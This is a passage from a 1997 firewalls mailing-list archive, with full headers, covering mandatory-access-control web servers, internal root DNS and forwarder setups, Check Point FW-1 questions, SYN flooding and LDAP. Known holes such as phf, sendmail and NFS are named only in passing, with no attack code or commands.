namely using mandatory access control (MAC) security. Here's what we have done for customers: The web server has two network connections, but has IP forwarding disabled. Processes coming in from one network see all file systems as read-only (making /tmp RO is an option), and there is no mechanism for bypassing that, even if the process is root. All device special files are complete inaccessible to all processes and all users -- also mknod(2) is disabled. If a user comes in from the other network, he/she can access the system normally, except that UID 0 (root) is treated as a normal account in terms of OS privilege, so attacks from this direction are also more tightly controlled (special programs are provided to manage the system instead of using a special account such as root). +------------+ <-------------->| Secured |<--------------> internal network | Web Site | Internet/PublicNet (RW file systems) +------------+ (RO file systems) When a Solaris host (x86 or SPARC) has been updated with this level of security, you can still use the r* commands, telnet, ftp, and even NFS from either side. You can have the RO restriction be done on a per-file basis as well, so you can be creative about your setup. BTW, I've seen a number of heated messages about the usefulness of Orange Book security in relation to the "real world". The above is an example of Orange Book security available on a late-release OS (Solaris 2.4 and Solaris 2.5.1), evaluated to B1 and C2 (the C2 is quite enhanced from the minimum requirements mentioned in the TCSEC), with Solaris 2.6 planned for summer (it should finish its evaluation by the end of the year as well). There IS a lot of Orange Book trash on the market -- stuff that is old, hard to use, and of questionable usefulness in the real world. But it IS possible to build state-of-the-art, flexible, feature-rich, affordable, evaluated systems. Other companies have also built trusted systems, and users of those systems can comment on their experiences. The old IBM/TIS Trusted Xenix is a very bad example of a trusted system. It reflects the state of technology in the late 1980's, not a modern system. I agree that if a box is a pure firewall, with no services of any kind being offered, then the addition of B-level security is of minor (but not zero) importance. The instant the firewall system is accessible directly, for example as a web site or for admin purposes, B-level security can be extremely powerful. paul ------------------------------------------------------------ Paul McNabb Argus Systems Group, Inc. Vice President and CTO 1405A East Florida Avenue mcnabb@argus.cu-online.com Urbana, IL 61801 USA TEL 217-384-6300 FAX 217-384-6404 "Securing the Future" ------------------------------------------------------------ From firewalls-owner Thu Jan 2 12:06:41 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA25404 for firewalls-outgoing; Thu, 2 Jan 1997 11:55:10 -0800 (PST) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA25397 for ; Thu, 2 Jan 1997 11:55:02 -0800 (PST) Received: by dtcro002.apogee-com.fr; id UAA08358; Thu, 2 Jan 1997 20:55:20 +0100 (MET) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma008356; Thu, 2 Jan 97 20:54:54 +0100 Received: from ingpc001.apogee-com.fr by (4.1/SMI-4.1) id AA28208; Thu, 2 Jan 97 20:52:14 +0100 Message-Id: <3.0.32.19970102205311.00723d5c@apogee1.apogee-com.fr> X-Sender: jfzw@apogee1.apogee-com.fr X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Thu, 02 Jan 1997 20:53:12 +0100 To: firewalls@greatcircle.com From: Jean-Francois ZWOBADA Subject: RE: DNS Proxy and Internal Root Name Ser Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 13:19 02/01/1997 -0600, you wrote: >I guess I should explain the assumptions I made. I assumed that you have >internal nameservers for you're domain that are not listed as >authoritative with InterNIC. I also assumed that you have already set up >an internal *root* nameserver situation that will spoof the internal >servers into believing that they are authoritative for the domain even >though they cannot, or you don't want them to, communicate with true >Internet root nameservers. What I have just explained is what I and many >other people have setup. > >The difference I saw was this: You are using you're internal *root* >nameserver to resolve queries. The internal *root* should not have host >data in it and should not be used to resolve names. It should run with >references to the internal nameservers and be listed in these internal >nameserver's root.db (or root.cache) file. No client should be using it >for name resolving; they should use the other nameservers that you have >setup as primary and secondaries. > >If my assumptions are incorrect let me know. > >Also, it may be that you have confused the terms 'root' and 'primary' >when it comes to nameservers. Please check to see that this is not the >case. > > >Rick > Well let me explain my solution: I assumed that the root name server was needed for linking different internal domains. I have an internal root nameserver and internal nameservers. These servers have a db.cache pointing to the internal root nameserver. And client send queries to these servers. These nameservers need to ask the root for other internal domains but they also need to resolve Internet names. I dont want my internal root server to forward these queries to the outside, 'cause it can't since it's a root server (I mean that it ignores a forwarders & slave configuration). So my nameservers need to ask someone else for Internet names: my firewall. To let them decide between asking the internal root or the firewall, I need to add something, since a 'forwarders' line overrides everything (a father name server, a child , ...). That's why I use the patch. I was really confused by your explanation and I am still quite confused... :o) I don't see why your solution solves the problem... Don't get angry , please :o) Thank you very much Jean-Francois From firewalls-owner Thu Jan 2 12:08:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA23092 for firewalls-outgoing; Thu, 2 Jan 1997 11:34:55 -0800 (PST) Received: from cat.bbsr.edu (cat.bbsr.edu [198.116.91.161]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA23084 for ; Thu, 2 Jan 1997 11:34:41 -0800 (PST) Message-Id: <199701021934.LAA23084@miles.greatcircle.com> Received: from [198.168.1.45] by cat.bbsr.edu (SMTPD32-3.00) id AD3B64B1012C; Thu Jan 02 15:32:11 1997 From: "Jamie Thain" To: Subject: NT NAT Date: Thu, 2 Jan 1997 15:30:38 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To All, There is now an NT NAT. http://www.on.com. regards:jamie From firewalls-owner Thu Jan 2 12:43:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA28304 for firewalls-outgoing; Thu, 2 Jan 1997 12:26:22 -0800 (PST) Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA28286 for ; Thu, 2 Jan 1997 12:26:07 -0800 (PST) Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id MAA03247; Thu, 2 Jan 1997 12:22:24 -0800 To: firewalls@GreatCircle.COM Path: cichlid From: owner-fw-1-mailinglist@us.checkpoint.com Newsgroups: mail.firewalls Subject: None Date: 2 Jan 1997 12:22:23 -0800 Lines: 39 Message-ID: <5ah5dv$cci@cichlid.cichlid.com> NNTP-Posting-Host: cichlid.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <6d2b7519a936fe1a@deliver.cichlid.com> Lines: 29 Xdeliver: processed on Thu Jan 2 12:22:19 PST 1997 Xdeliver: SENDER owner-fw-1-mailinglist@us.checkpoint.com Xdeliver: to Xdeliver: cc Xdeliver: apparent_to Xdeliver: from owner-fw-1-mailinglist@us.checkpoint.com X-Nvlenv-01Date-Transferred: 2-Jan-1997 13:38:31 -0500; at DMZL1.NAVL X-Nvlenv-01Date-Posted: 02-Jan-1997 13:41:27 -0500; at COMM2.NAVL From: MBARASCH@navl.com (Mike Barasch) To: FW-1-MAILINGLIST@us.checkpoint.com Date: 02 Jan 97 13:41:00 EST Subject: License # Message-Id: <"<79FCC332816F2D79>79FCC332816F2D79@COMM2.NAVL"@-SMF-> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: owner-fw-1-mailinglist@us.checkpoint.com Precedence: bulk I have Win NT 4.0 with Checkpoint 2.1c with 250 user license. Everytime I restart my firewall I receive a message in the Event viewer on NT that says FW1: FW-1 only 256 internal hosts allowed. My firewall seems to be working fine, does this message indicate that I have more than 256 ip hosts on the network. How can I tell how many ip addresses that firewall can detect? Thanks! Mike Barasch North American Van Lines From firewalls-owner Thu Jan 2 13:57:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA01960 for firewalls-outgoing; Thu, 2 Jan 1997 12:54:51 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA01869 for ; Thu, 2 Jan 1997 12:54:15 -0800 (PST) Received: by smartwall.v-one.com; id PAA16481; Thu, 2 Jan 1997 15:50:35 -0500 (EST) Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma016468; Thu, 2 Jan 97 15:50:20 -0500 Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBF8C5.50252D00@nt_fs1.V-ONE.COM>; Thu, 2 Jan 1997 15:55:01 -0500 Message-ID: From: "McMahan, Peg" To: "'Jim Truitt'" , "'Paul Ferguson'" , "'Caldwell, Matt COLASC'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: Security Administrators: Web of Trust Date: Thu, 2 Jan 1997 15:55:01 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >---------- >From: Caldwell, Matt COLASC[SMTP:caldwm@msgate.ColumbiaSC.NCR.COM] >Sent: Thursday, January 02, 1997 1:35 PM >To: Jim Truitt; Paul Ferguson >Cc: firewalls@GreatCircle.COM >Subject: Security Adminstrators: Web of Trust > >[snip] >>So, what can you do? Log, log, log. And more logging. And get >>to know the security administrator upstream from you. >> >>- paul >[snip] > >This is simple, but excellent advice. Users of PGP are always talking >about >a "web of trust". Perhaps what is needed is a web of trust between >security > >Maybe what we need is our own group that promotes trust between each >other and lets >us get to gether as professionals. or a web site etc.. This seems rather unlikely to me... I'm an admin, have been an admin for quite some time, and while I do get to know and trust people, I would NOT trust my systems to anyone else, nor put my trust in anyone's systems... Just because you trust someone doesn't mean they're NOT a dumbass. Trust is (to me anyway) a very very bad word when it comes to security issues. Promoting trust is one thing, but personally I think it's best to be as paranoid as possible, as often as possible. Getting together and trusting each other can only go so far. I can see getting to know the people upstream from you, but that doesn't mean that someone else on that site isn't on the shifty side of things... Paranoia seems like the best option to me. > >admins. Just a thought. > >Jim truitt > > /~~\/~~\/~~\/~~\/~~\/~~\ >| /\/ /\/ /\/ /\/ /\/ /\ | peg@v-one.com >| \/ /\/ /\/ /\/ /\/ /\/ | www.v-one.com > \ \/\ \/\ \/\ \/\ \/\ \/ > /\ \/\ \/\ \/\ \/\ \/\ \ Systems Engineer >| /\/ /\/ /\/ /\/ /\/ /\ | 1803 Research Blvd >| \/ /\/ /\/ /\/ /\/ /\/ | Rockville, MD 20850 > \__/\__/\__/\__/\__/\__/ (301)838-8900 x 224 From firewalls-owner Thu Jan 2 14:09:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA03851 for firewalls-outgoing; Thu, 2 Jan 1997 13:13:34 -0800 (PST) Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA03827 for ; Thu, 2 Jan 1997 13:13:24 -0800 (PST) Received: from sdfpc2.gsfc.nasa.gov by csc.com with smtp (Smail3.1.29.1 #1) id m0vfuRK-001AdXC; Thu, 2 Jan 97 16:12 EST Message-ID: <32CC5118.5FB8@csc.com> Date: Thu, 02 Jan 1997 16:21:44 -0800 From: Adam Safier Reply-To: asafier@csc.com Organization: Computer Sciences Corp. X-Mailer: Mozilla 3.0 (Win16; U) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: DNS Proxy and Internal Root Name Server References: <199701020900.BAA15175@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm missing something in this DNS discussion. Don't make the internal "root" a root, make it your "main" DNS server with a limited cache file. You set the "main" internal DNS server to act as a recursive resolver for all internal DNS servers. Point it only to the external DNS server which can also act as a recursive resolver. All internal DNS servers point to the internal "main" server only using fowarder/slave lines. External queries are recursively resolved by your "main" DNS server which can pass through the firewall and has forwarder/slave lines pointing to the external DNS server. The answers are received by the external server, forwarded to the "main" server and then forwarded to internal slave DNS servers or actual workstations. There is no need for the other internal DNS servers to see your proxy or external DNS server. Internet---DNS external recursive resolver----FW----DNS main recursive resolver | Other DNS servers only point to DNS main and use recursive queries. (P31, 143 in O'Reilly) Adam JF wrote: > Date: Thu, 02 Jan 1997 09:03:03 +0100 > From: Jean-Francois ZWOBADA > Subject: Re: DNS Proxy and Internal Root Name Server > > At 16:59 31/12/1996 -0500, R. McMahon wrote: > >Background: > >I am looking at setting up a DNS proxy using "forwarders" and "slave" > >lines in by /etc/named.boot file as described in the "Building > >Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do > >this where I can maintain an internal Root name server. For resolution > >of domain names outside the internal top-level domains, I would like the > >proxy name server (which will have an "external" domain name) be the > >only name server queried by the internal root name server and having > >this proxy be the only host to query external name servers. (I would > >set up UDP port 53 filtering on the router.) > > > >Problem: > >One problem I thought of concerns the mitigation between the internal > >root name server and the forwarders/slave lines. If a subordinate > >domain name server queries the root name server for an "outside" domain, > >how would it know to forward the query to the proxy (being that it is a > >internal root name server)? I could have my subordinate top-level > >domain name serves query the proxy directly by putting forwarders line > >in it's /etc/named.boot, however, this would bypass the internal root > >structure. It seems to be straight forward w/o an internal root name > >server, however, I need to maintain these root name server. Can anyone > >help. > > > >Thanks, > > > >rwm > > > The problem with an internal root server is that it wont take any account > of your forwarders & slave options because it is said to be a root server. > The only solution I think of is adding the noforward patch in the named > daemons of the first level name servers you have under your root server. > You just have to specify all the domains known by your internal root > nameserver > so that your lower level nameserver would query it but would forward to your > proxy for everything else. > > Hope this helps > > Jean-Francois > > PS: the noforward patch is available for BIND on ftp.vix.com (but I can't > remember the path...) -- Adam Safier asafier@csc.com http://www.csc.com CSC-SED-Infosec (301) 794-1349 (301) 552-3272 (fax) Technology Abuse: 1) Netscape Frames on a 14" screen. 2) Netscape 3.0 on a 386-33 w/ 8 Meg RAM. The above are my own opinions. I'm proud to live in a country where I'm free to express them! From firewalls-owner Thu Jan 2 14:20:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05339 for firewalls-outgoing; Thu, 2 Jan 1997 13:38:14 -0800 (PST) Received: from mail.epcorp.com (marauder.epcorp.com [198.30.14.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA05307 for ; Thu, 2 Jan 1997 13:37:51 -0800 (PST) Received: from eppcmcw.eapi.com by mail.epcorp.com id aa23986; 2 Jan 97 16:31 EST Message-Id: <3.0.32.19970102163131.00b1a550@hellcat.epcorp.com> X-Sender: martinw@hellcat.epcorp.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 02 Jan 1997 16:31:36 -0500 To: firewalls@greatcircle.com From: "Martin C. Walker" Subject: syndefender (fw-1) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Trying to determine if FW-1 itself (solaris x86) is susceptible to the TCP SYN denial of service attack, and if so then whether deploying their syndefender product (either gateway or relay) will help. Does anyone have any ideas regarding this ? Since I don't allow any inbound connections to my machines other than the FW-1 (DNS/SMTP) I don't think anything else is at risk. -------------------------------------------------------------------------- Martin C. Walker | martinw@epcorp.com | PP-ASEL,IFR AA5-A 9908U Project Lead | (513)629-2517 | Blue Belt Okinawan Shuri-Ryu Eagle-Picher Inc. | Fax: (513)629-2449 | Porsche 911SC 580 Walnut St, | | Cincinnati, OH 45202 | | From firewalls-owner Thu Jan 2 14:59:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA09128 for firewalls-outgoing; Thu, 2 Jan 1997 14:17:01 -0800 (PST) Received: from balder-int.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA09108 for ; Thu, 2 Jan 1997 14:16:51 -0800 (PST) Received: by balder-int.ssds.com id PAA29925; Thu, 2 Jan 1997 15:14:38 -0700 (MST) Received: from baltimore.ssds.com(134.127.34.1) by balder.ssds.com via smap (3.2) id xma029914; Thu, 2 Jan 97 15:14:12 -0700 Received: by baltimore.ssds.com id RAA23131; Thu, 2 Jan 1997 17:15:32 -0500 (EST) Message-Id: <2.2.32.19970102221336.0069bfd4@baltimore.ssds.com> X-Sender: mam@baltimore.ssds.com (Unverified) X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 02 Jan 1997 17:13:36 -0500 To: FaNgYoU2 From: "Mike 'Will tame Cisco's for food' Malik" Subject: Re: Lightweight Directory Access Protocol Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 07:41 PM 12/31/96 -0500, FaNgYoU2 wrote: >Lightweight Directory Access Protocol (LDAP) is designed to be a low cost >and low overhead way of accessing enterprise names directories that are >based on X.500. A number of major LAN operating systems vendors have made >statements that they will develop modules for their operating systems that >will interact with LDAP enterprise names directories. My limited amount >of web surfing showed that some development is being done in Unix to >access LDAP as well as the traditional DNS. > [SNIP] >Any of you hot shot vendors or Chief Scientists or consultants that >left firewall vendors for other companies doing any work to include >LDAP enterprise directory access in firewalls? You know I'm not sure I want all this flexibility going through my firewall. I sure someone might, I think this protocol might give all those "hot shot vendors and Chief Scientists" headaches for years to come. Of course this is just my take on the matter. Mike Multi-platform is 2 or more Micosoft OS's in a group ----_____u_ like_diversity__is_different__gendered__and_colored__fascists.__|--|______)- o+o o+o o+o o+o o+o o+o o+o o+o o+o o+o o+o Q-Q-Q==\ ______________________________________________________________________________ \ / \ / \ / \ / /==============================\ \ / |\/| |\/| |\/| |\/|/ \|\/| |/\| |/\| |/\| |/\|| ||/\| |\/| |\/| |\/| |\/|| ||\/| |/\|______|/\|___________|/\|____|/\||\............................../||/\| From firewalls-owner Thu Jan 2 15:59:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA17175 for firewalls-outgoing; Thu, 2 Jan 1997 15:47:46 -0800 (PST) Received: from deepeddy.com (DeepEddy.Com [192.12.3.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA17127 for ; Thu, 2 Jan 1997 15:47:27 -0800 (PST) Received: (qmail 18940 invoked from network); 2 Jan 1997 23:46:55 -0000 Received: from localhost (HELO deepeddy.DeepEddy.Com) (@127.0.0.1) by localhost with SMTP; 2 Jan 1997 23:46:55 -0000 X-Mailer: exmh version 2.0beta 12/23/96 To: mcnabb@argus.cu-online.com (Paul McNabb) Cc: Firewalls@GreatCircle.COM Subject: Re: Read-only Web Site (was AF hack) In-Reply-To: Your message of "Thu, 02 Jan 1997 12:41:29 CST." <199701021841.MAA21415@argus.cu-online.com> X-Url: http://www.DeepEddy.Com/~cwg From: cwg@DeepEddy.Com Cc: cwg@DeepEddy.Com Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_1341457136P"; micalg=pgp-md5; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Thu, 02 Jan 1997 17:46:52 -0600 Message-ID: <18937.852248812@deepeddy.DeepEddy.Com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --==_Exmh_1341457136P Content-Type: text/plain; charset=us-ascii > The web server has two network connections, but has IP forwarding > disabled. Processes coming in from one network see all file systems > as read-only (making /tmp RO is an option), and there is no mechanism > for bypassing that, even if the process is root. All device special > files are complete inaccessible to all processes and all users -- also > mknod(2) is disabled. If a user comes in from the other network, > he/she can access the system normally, except that UID 0 (root) is > treated as a normal account in terms of OS privilege, so attacks from > this direction are also more tightly controlled (special programs > are provided to manage the system instead of using a special account > such as root). > > +------------+ > <-------------->| Secured |<--------------> > internal network | Web Site | Internet/PublicNet > (RW file systems) +------------+ (RO file systems) > > When a Solaris host (x86 or SPARC) has been updated with this level > of security, you can still use the r* commands, telnet, ftp, and > even NFS from either side. You can have the RO restriction be done > on a per-file basis as well, so you can be creative about your setup. How do you do this? Chris -- Chris Garrigues O- cwg@DeepEddy.Com Deep Eddy Internet Consulting +1 512 432 4046 609 Deep Eddy Avenue Austin, TX 78703-4513 http://www.DeepEddy.Com/~cwg/ --==_Exmh_1341457136P Content-Type: application/pgp-signature -----BEGIN PGP MESSAGE----- Version: 2.6.2 iQB1AwUBMsxI5ZaQnaaFII2dAQHcjQL+PanW9GVJcFhD451syHlSSONXy7fWtpsr fPKtEq3nQGce+Wd6iOV15sD7QQagcvZQSyPf6QvsQ11P8xUGzFuiCa8oOvHnlm4k aF6T5VcBg0aiesTmpannrDzuNiEYjdkF =ces4 -----END PGP MESSAGE----- --==_Exmh_1341457136P-- From firewalls-owner Thu Jan 2 16:37:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA17866 for firewalls-outgoing; Thu, 2 Jan 1997 15:57:53 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA17836 for ; Thu, 2 Jan 1997 15:57:28 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ga135752 for ; Fri, 3 Jan 1997 00:57:15 +0100 Received: by ppp46.sbbs.se with Microsoft Mail id <01BBF910.CFC863B0@ppp46.sbbs.se>; Fri, 3 Jan 1997 00:55:28 +0100 Message-ID: <01BBF910.CFC863B0@ppp46.sbbs.se> From: Sebastian Stache To: "'Firewalls (inet/GreatCircle)'" Cc: "'long-morrow@CS.YALE.EDU'" , "'mjo@dojo.mi.org'" Subject: RE: Air Force Web Site Hacked Date: Fri, 3 Jan 1997 00:53:10 +0100 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BBF910.CFC863B0" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------ =_NextPart_000_01BBF910.CFC863B0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Morrow wrote: >You'd be surprised at how many NCSA httpd sites are >still out there which are vulnerable to the attack: You're right, I'm amazed. I've seen variations on the phf theme everywhere (including this list), so I would have thought a military organisation would know better. And how many on this list do not know of bouncing mails in early versions of sendmail, or of NFS weaknesses (referring to Michael J. O'Conner's reply)? In a way it's comforting to hear that these sites are accessible to anyone capable of reading COAST, or any other primer on security - it definitely must mean that the cold war is really over. Regards, Sebastian Stache ------ =_NextPart_000_01BBF910.CFC863B0 Content-Type: application/ms-tnef Content-Transfer-Encoding: base64 eJ8+IhwXAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEkAYAQAQAAAMAAAAMAAAAAwAAMAYAAAAL AA8OAAAAAAIB/w8BAAAAfQAAAAAAAAC1O8LALHcQGqG8CAArKlbCFQAAADqmsGxq684RmGoAQDMr A9dknAAAAAAAAIErH6S+oxAZnW4A3QEPVAIAAAAARmlyZXdhbGxzQEdyZWF0Q2lyY2xlLkNPTQBT TVRQAEZpcmV3YWxsc0BHcmVhdENpcmNsZS5DT00AAAAAHgACMAEAAAAFAAAAU01UUAAAAAAeAAMw AQAAABoAAABGaXJld2FsbHNAR3JlYXRDaXJjbGUuQ09NAAAAAwAVDAEAAAADAP4PBgAAAB4AATAB AAAAHwAAACdGaXJld2FsbHMgKGluZXQvR3JlYXRDaXJjbGUpJwAAAgELMAEAAAAfAAAAU01UUDpG SVJFV0FMTFNAR1JFQVRDSVJDTEUuQ09NAAADAAA5AAAAAAsAQDoBAAAAAgH2DwEAAAAEAAAAAAAA Bg0AAAADAAAwBwAAAAsADw4BAAAAAgH/DwEAAABNAAAAAAAAAIErH6S+oxAZnW4A3QEPVAIAAAEA bG9uZy1tb3Jyb3dAQ1MuWUFMRS5FRFUAU01UUABsb25nLW1vcnJvd0BDUy5ZQUxFLkVEVQAAAAAe AAIwAQAAAAUAAABTTVRQAAAAAB4AAzABAAAAGAAAAGxvbmctbW9ycm93QENTLllBTEUuRURVAAMA FQwCAAAAAwD+DwYAAAAeAAEwAQAAABoAAAAnbG9uZy1tb3Jyb3dAQ1MuWUFMRS5FRFUnAAAAAgEL MAEAAAAdAAAAU01UUDpMT05HLU1PUlJPV0BDUy5ZQUxFLkVEVQAAAAADAAA5AAAAAAsAQDoAAAAA AgH2DwEAAAAEAAAAAAAABwIB+Q8BAAAATQAAAAAAAACBKx+kvqMQGZ1uAN0BD1QCAAABAGxvbmct bW9ycm93QENTLllBTEUuRURVAFNNVFAAbG9uZy1tb3Jyb3dAQ1MuWUFMRS5FRFUAAAAADQAAAAMA ADAIAAAACwAPDgEAAAACAf8PAQAAAD0AAAAAAAAAgSsfpL6jEBmdbgDdAQ9UAgAAAQBtam9AZG9q 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 ------ =_NextPart_000_01BBF910.CFC863B0-- From firewalls-owner Thu Jan 2 17:00:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA20749 for firewalls-outgoing; Thu, 2 Jan 1997 16:18:48 -0800 (PST) Received: from nova.dreamscape.com (nova.dreamscape.com [206.64.128.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA20650 for ; Thu, 2 Jan 1997 16:18:19 -0800 (PST) Received: from garcia (sb9.dreamscape.com [206.114.183.170]) by nova.dreamscape.com (8.8.4/8.8.4) with SMTP id TAA22470 for ; Thu, 2 Jan 1997 19:17:59 -0500 (EST) Message-ID: <32CC4FD9.70A9@future.dreamscape.com> Date: Thu, 02 Jan 1997 19:16:25 -0500 From: Steve Matkoski Reply-To: makoski@future.dreamscape.com 